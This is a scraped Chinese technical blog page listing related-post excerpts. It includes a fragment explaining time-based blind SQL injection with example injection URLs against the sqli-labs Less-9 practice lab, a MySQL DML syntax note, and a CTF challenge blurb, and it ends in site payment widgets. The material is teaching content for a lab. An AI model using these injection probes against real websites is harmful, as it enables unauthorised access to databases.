什么是时间盲注 时间盲注指通过页面执行的时间来判断数据内容的注入方式,通常用于数据(包含逻辑)不能返回到页面中的场景,无法利用页面回显判断数据内容,只能通过执行的时间来获取数据。 时间盲注的过程 1、找到注入点,并选择合适的注入语句 2、爆破 这里以sqli-lab第九关为例 192.168.3.10/sqli/Less-9/?id=1拿不到明显的回显(You are in…) 192.168.3.10/sqli/Less-9/?id=1’ --+ 也拿不到明显的回显(You are in…) 192.1
sqli-labs通关全解---关于盲注脚本的编写--less7-10-4
cyynid的博客
01-10 566
盲注
MySQL
、moddemod
11-26 816
DML:增删改表中的数据 1. 添加数据: * 语法: * insert into 表名(列名1,列名2,列名3) values(值1,值2,值3) * 注意: 1. 列名和值类要一一对应 2. 如果表名后不定义列名,则默认给所有列添加值 3. 除了数字类,其他类需要使用引号引起来,单双都可以 2. 删除数据 * 语法 * delete from 表名 [where 条件]
yet_another_mysql_injection
最新发布
06-06
yet_another_mysql_injection是一种MySQL注入攻击的形式。MySQL注入攻击是指攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取或篡改数据库中的数据。这种攻击方式常常利用Web应用程序中的漏洞,例如未经过滤的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值